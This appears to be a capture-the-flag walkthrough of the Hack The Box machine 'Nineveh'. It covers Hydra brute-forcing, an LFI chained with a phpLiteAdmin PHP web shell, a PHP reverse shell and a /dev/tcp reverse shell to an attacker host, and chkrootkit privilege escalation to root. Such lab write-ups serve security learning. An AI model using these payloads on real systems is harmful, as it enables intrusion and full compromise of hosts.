Nineveh

Reconnaissance:

NMAP:

โ”Œโ”€โ”€(kali๐Ÿ’€kali)-[~]
โ””โ”€$ sudo nmap -sC -sV -O 10.10.10.43 

80/tcp  open  http     Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)

443/tcp open  ssl/http Apache httpd 2.4.18 ((Ubuntu))
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=nineveh.htb/organizationName=HackTheBox Ltd/stateOrProvinceName=Athens/countryName=GR
| Not valid before: 2017-07-01T15:03:30
|_Not valid after:  2018-07-01T15:03:30
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
| tls-alpn: 
|_  http/1.1
โ”Œโ”€โ”€(kali๐Ÿ’€kali)-[~]
โ””โ”€$ sudo nmap -sU -O 10.10.10.43   

All 1000 scanned ports on 10.10.10.43 (10.10.10.43) are in ignored states.
โ”Œโ”€โ”€(kali๐Ÿ’€kali)-[~]
โ””โ”€$ sudo nmap -sC -sV -p- 10.10.10.43

80/tcp  open  http     Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).

443/tcp open  ssl/http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
| ssl-cert: Subject: commonName=nineveh.htb/organizationName=HackTheBox Ltd/stateOrProvinceName=Athens/countryName=GR
| Not valid before: 2017-07-01T15:03:30
|_Not valid after:  2018-07-01T15:03:30
|_ssl-date: TLS randomness does not represent time
|_http-title: 400 Bad Request
| tls-alpn: 
|_  http/1.1

nmap shows only HTTP (TCP 80) and HTTPS (TCP 443) open:

โ”Œโ”€โ”€(kali๐Ÿ’€kali)-[~]
โ””โ”€$ nslookup
> server 10.10.10.43 
Default server: 10.10.10.43
Address: 10.10.10.43#53

First, add the domain name to the /etc/hosts file.

โ”Œโ”€โ”€(kali๐Ÿ’€kali)-[~]
โ””โ”€$ sudo nano /etc/hosts   
10.10.10.43 nineveh.htb

View the page source to see if it gives you any other information. CTRL + U

Enumeration: Website - TCP 80

The site just displays a simple success page with no further information: This is the same visiting by IP address or nineveh.htb.

Gobuster Enumeration:

โ”Œโ”€โ”€(kali๐Ÿ’€kali)-[~]
โ””โ”€$ gobuster dir -u http://10.10.10.43 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 20 -x php,txt,html

/.html                (Status: 403) [Size: 291]
/index.html           (Status: 200) [Size: 178]
/.php                 (Status: 403) [Size: 290]
/info.php             (Status: 200) [Size: 83681]
/department           (Status: 301) [Size: 315] [--> http://10.10.10.43/department/]
/.php                 (Status: 403) [Size: 290]
/.html                (Status: 403) [Size: 291]

Virtual Host Enumeration:

โ”Œโ”€โ”€(kali๐Ÿ’€kali)-[~]
โ””โ”€$ gobuster vhost -k --domain nineveh.htb --append-domain -u 10.10.10.43 -w /usr/share/seclists/SecLists-master/Discovery/DNS/subdomains-top1million-110000.txt 
โ”Œโ”€โ”€(kali๐Ÿ’€kali)-[~]
โ””โ”€$ nikto -h http://10.10.10.43 

+ Server: Apache/2.4.18 (Ubuntu)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /: Server may leak inodes via ETags, header found with file /, inode: b2, size: 5535e4e04002a, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ OPTIONS: Allowed HTTP Methods: GET, HEAD, POST, OPTIONS .
+ /info.php: Output from the phpinfo() function was found.
+ /info.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information. See: CWE-552
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /info.php?file=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
+ 8046 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time:           2023-12-29 22:56:25 (GMT-5) (2435 seconds)

/info.php

http://nineveh.htb/info.php

/department

Visit the /department directory.

http://nineveh.htb/department/login.php

I tried some basic password guessing, and noticed that the error messages were indicating if the user existed. For example, when I tried admin: Invalid Password!

When I tried nineveh: invalid username

Enumeration: Website - TCP 443

This is the same visiting by IP address or nineveh.htb.

https://nineveh.htb/

Gobuster Enumeration:

โ”Œโ”€โ”€(kali๐Ÿ’€kali)-[~]
โ””โ”€$ gobuster dir -k -u https://10.10.10.43 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -t 20 -x php,txt,html

/db                   (Status: 301) [Size: 309] [--> https://10.10.10.43/db/]
/server-status        (Status: 403) [Size: 300]
/secure_notes         (Status: 301) [Size: 319] [--> https://10.10.10.43/secure_notes/]

/db /db returns a login for a phpLiteAdmin instance: https://nineveh.htb/db/

phpLiteAdmin is a PHP interface for interacting with SQLite databases. Itโ€™s version 1.9, which searchsploit shows there are exploits for: https://www.phpliteadmin.org/

/secure_notes This page is just an image: https://nineveh.htb/secure_notes/

โ”Œโ”€โ”€(kali๐Ÿ’€kali)-[~]
โ””โ”€$ searchsploit phpliteadmin
--------------------------------------------------------------- ---------------------------------
 Exploit Title                                                 |  Path
--------------------------------------------------------------- ---------------------------------
phpLiteAdmin - 'table' SQL Injection                           | php/webapps/38228.txt
phpLiteAdmin 1.1 - Multiple Vulnerabilities                    | php/webapps/37515.txt
PHPLiteAdmin 1.9.3 - Remote PHP Code Injection                 | php/webapps/24044.txt
phpLiteAdmin 1.9.6 - Multiple Vulnerabilities                  | php/webapps/39714.txt

Examining each of these with searchsploit -x [path], the first is a version match and seems like a good way to get execution. The second also looks like it should work, if I want to do SQLi. The third one is not a version match, and the fourth has a bunch of less interesting vulnerabilities like XSS and CSRF. For all of them, I need to authenticate first.

Shell as www-data (via phpinfo.php) Port 80

Visit the /department directory. http://nineveh.htb/department/login.php

We get a login form. View the page source to to see if it gives you any other information.

view-source:http://nineveh.htb/department/login.php
<!-- @admin! MySQL is been installed.. please fix the login page! ~amrois -->

Brute force: Hydra

โ”Œโ”€โ”€(kali๐Ÿ’€kali)-[~]
โ””โ”€$ hydra -l 'admin' -P /usr/share/wordlists/rockyou.txt nineveh.htb http-post-form '/department/login.php:username=^USER^&password=^PASS^&Login=Login:Invalid Password!'

[80][http-post-form] host: nineveh.htb   login: admin   password: 1q2w3e4r5t

It found the valid password! Log into the application using the credentials we found. Visit the Notes tab. We get the following text.

http://nineveh.htb/department/manage.php?notes=files/ninevehNotes.txt

Have you fixed the login page yet! hardcoded username and password is really bad idea!
check your serect folder to get in! figure it out! this is your challenge
Improve the db interface.
~amrois

None of it makes much sense at this point. They do mention a secret folder. Maybe weโ€™ll find that while enumerating port 443. One thing to notice is the URL that generates the page looks like a file path. When you see a file path, the first thing you should try is an LFI. I tried and it didnโ€™t exactly work. When I try the following string

../../../../../../../etc/passwd

Iโ€™m back to the โ€œNo Note is selectedโ€ message. This leads me to believe that it is vulnerable to LFI, however, there is a check on the backend that is grepping for the string โ€œninevehNotesโ€ since my query doesnโ€™t work without it. According to the error, weโ€™re in the /www/html/department/ directory, so we need to go three directories above. Letโ€™s try with this string.

http://nineveh.htb/department/manage.php?notes=/ninevehNotes/../../../etc/passwd

It worked!

root:x:0:0:root:/root:/bin/bash
amrois:x:1000:1000:,,,:/home/amrois:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin

When it comes to LFIs, you usually need to chain it to another vulnerability in order to get remote code execution. Therefore, Iโ€™m going to start enumerating the next port to see if I can find another vulnerability that I can chain this one to.

Shell as www-data (via phpLiteAdmin) Port 443

Visit the page in the browser. https://nineveh.htb/

View the page source to see if it gives you any extra information. We donโ€™t get anything useful. Next, view the SSL certificate. admin@nineveh.htb

/secure_notes This might be what the comment โ€œcheck your secret folderโ€ was referring to. Save the image, it might have a secret stored in it. Weโ€™ll look into that later. https://nineveh.htb/secure_notes/

/db /db returns a login for a phpLiteAdmin instance: https://nineveh.htb/db/

I tried the default password โ€œadminโ€ for phpLiteAdmin v1.9 but that did not work. Letโ€™s try brute-forcing the password. First, intercept the request in Burp.

Then run hydra on the login form.

โ”Œโ”€โ”€(kali๐Ÿ’€kali)-[~]
โ””โ”€$ hydra -l 'admin' -P /usr/share/wordlists/rockyou.txt nineveh.htb https-post-form '/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true&Login=Login:Incorrect password.'

[443][http-post-form] host: nineveh.htb   login: admin   password: password123

Letโ€™s view the content of the Remote PHP Code Injection exploit. According to the comments made in the exploit, an attacker can create a sqlite database with a php extension and insert php code as text fields. When done, the attacker can execute it simply by accessing the database file using the browser.

LogoPHPLiteAdmin 1.9.3 - Remote PHP Code InjectionExploit Database

This is exactly the vulnerability I was hoping to find! This vulnerability allows me to drop a malicious file on the server and the LFI vulnerability we found earlier allows me to call and execute my malicious file.

โ”Œโ”€โ”€(kali๐Ÿ’€kali)-[~]
โ””โ”€$ searchsploit phpLiteAdmin 1.9                                       
--------------------------------------------------------------- ---------------------------------
 Exploit Title                                                 |  Path
--------------------------------------------------------------- ---------------------------------
PHPLiteAdmin 1.9.3 - Remote PHP Code Injection                 | php/webapps/24044.txt
phpLiteAdmin 1.9.6 - Multiple Vulnerabilities                  | php/webapps/39714.txt

  1. In the Create New Database section, create a new database called random.php. Then click on random.php in the Change Database section. There, create a new table called random with 1 field. In the Field parameter add the following code and change the Type to TEXT.

<?php echo system($_REQUEST ["cmd"]); ?>

  1. Click Create. As mentioned in the below image, the file is created in the directory /var/tmp.

  2. Now, letโ€™s go back to the LFI vulnerability and execute our php code.

http://nineveh.htb/department/manage.php?notes=/ninevehNotes/../../../../var/tmp/random.php&cmd=ls

We have code execution! Letโ€™s intercept the request in Burp and add a reverse shell to the cmd parameter.

php -r '$sock=fsockopen("10.10.16.4",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

Then add the code to the cmd parameter in Burp and URL encode it (Ctrl+U).

Setup a listener to receive the reverse shell.

โ”Œโ”€โ”€(kali๐Ÿ’€kali)-[~]
โ””โ”€$ nc -nlvp 1234
listening on [any] 1234 ...
connect to [10.10.16.4] from (UNKNOWN) [10.10.10.43] 51386
$ whoami
www-data

Letโ€™s upgrade it to a partially interactive bash shell.

$ python3 -c 'import pty; pty.spawn("/bin/bash")'

Now letโ€™s view the permission of the user.txt file.

www-data@nineveh:/var/www/html/department$ ls -la /home/amrois/         
total 32
drwxr-xr-x 4 amrois amrois 4096 Jul  3  2017 .
drwxr-xr-x 3 root   root   4096 Jul  2  2017 ..
-rw------- 1 amrois amrois    0 Jul  2  2017 .bash_history
-rw-r--r-- 1 amrois amrois  220 Jul  2  2017 .bash_logout
-rw-r--r-- 1 amrois amrois 3765 Jul  2  2017 .bashrc
drwx------ 2 amrois amrois 4096 Jul  3  2017 .cache
-rw-r--r-- 1 amrois amrois  655 Jul  2  2017 .profile
drwxr-xr-x 2 amrois amrois 4096 Jul  2  2017 .ssh
-rw------- 1 amrois amrois   33 Jul  2  2017 user.txt

Weโ€™re running as www-data, so we donโ€™t have rights to read the file. We need to escalate our user privileges.

Priv: www-data โ€“> root

Letโ€™s transfer the LinEnum script from our attack machine to the target machine. In the attack machine, start up a server in the same directory that the script resides in.

โ”Œโ”€โ”€(kali๐Ÿ’€kali)-[/opt/linpeas]
โ””โ”€$ python -m SimpleHTTPServer 5555

In the target machine, change to the /tmp directory where we have write privileges and download the LinPeas script.

www-data@nineveh:/var/www/html/department$ cd /tmp
www-data@nineveh:/tmp$ wget http://10.10.16.4:5555/linpeas.sh

Give it execute privileges.

www-data@nineveh:/tmp$ chmod +x linpeas.sh

Run the script.

www-data@nineveh:/tmp$ ./linpeas.sh

โ•”โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•ฃ Executing Linux Exploit Suggester 2
โ•š https://github.com/jondonas/linux-exploit-suggester-2                                          
  [1] af_packet                                                                                  
      CVE-2016-8655
      Source: http://www.exploit-db.com/exploits/40871
  [2] exploit_x
      CVE-2018-14665
      Source: http://www.exploit-db.com/exploits/45697
  [3] get_rekt
      CVE-2017-16695
      Source: http://www.exploit-db.com/exploits/45010

โ•”โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•ฃ Superusers
root:x:0:0:root:/root:/bin/bash                                                                  

โ•”โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•ฃ Users with console
amrois:x:1000:1000:,,,:/home/amrois:/bin/bash                                                    
root:x:0:0:root:/root:/bin/bash

In our nmap scan, port 22 was not reported to be open, however, the LinEnum script reports it as listening on localhost. Iโ€™m not sure what to do with this piece of information but Iโ€™ll keep it at the back of my mind in case I donโ€™t find any other way to escalate privileges.

Next, letโ€™s try pspy. If you donโ€™t have the script, you can download it from the following github repository.

LogoGitHub - DominicBreuker/pspy: Monitor linux processes without root permissionsGitHub

Every minute or so the chkrootkit is being run. Iโ€™ve never seen that on a machine before so I googled it and found out that it is a program intended to help system administrators check their system for known rootkits. Next, I googled โ€œchkrootkit privilege escalationโ€ and landed on this

LogoChkrootkit 0.49 - Local Privilege EscalationExploit Database

There is a privilege escalation vulnerability with old versions of this software that will run any executable file named /tmp/update as root. Therefore, all we have to do is create an โ€œupdateโ€ file that contains a reverse shell and wait for the scheduled task to give us a shell with root privileges.

Iโ€™ll write a simple reverse shell to /tmp/update and make it executable:

โ”Œโ”€โ”€(kali๐Ÿ’€kali)-[~]
โ””โ”€$ nc -lnvp 443
amrois@nineveh:/tmp$ echo -e '#!/bin/bash\n\nbash -i >& /dev/tcp/10.10.16.4/443 0>&1' > update
amrois@nineveh:/tmp$ chmod +x update

The next time chkroot runs, I get a shell:

โ”Œโ”€โ”€(kali๐Ÿ’€kali)-[~]
โ””โ”€$ nc -lnvp 443
listening on [any] 443 ...
connect to [10.10.16.4] from (UNKNOWN) [10.10.10.43] 34392

root@nineveh:~# cat root.txt
3e49e3c7----------------------------

root@nineveh:~# cat /home/amrois/user.txt
0349e71f-----------------------------
PreviousCronosNextSense

Last updated